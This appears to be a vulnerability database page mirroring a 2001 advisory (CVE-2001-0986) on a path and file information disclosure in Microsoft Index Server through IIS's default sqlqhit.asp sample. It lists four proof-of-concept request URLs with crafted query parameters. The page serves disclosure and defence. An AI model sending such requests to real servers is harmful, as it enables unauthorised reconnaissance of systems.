Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2001-0986

Publish Date: 14 Sep 2001

                source: http://www.securityfocus.com/bid/3339/info

The sqlqhit.asp sample file is used for performing web-based SQL queries.

Malicious users could send specifically crafted HTTP request to an Internet Information Services server running Index Server to reveal path information, file attributes, and possibly some lines of the file contents.

The sqlqhit.asp file is located in the \inetpub\iissamples\ISSamples\ folder and is installed by default. 

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&amp;CiScope=webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&amp;CiScope=extended_fileinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&amp;CiScope=extended_webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&amp;CiScope=fileinfo

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Index Server 2.0 - File Information / Full Path Disclosure

Vulmon Search

About

Products

Connect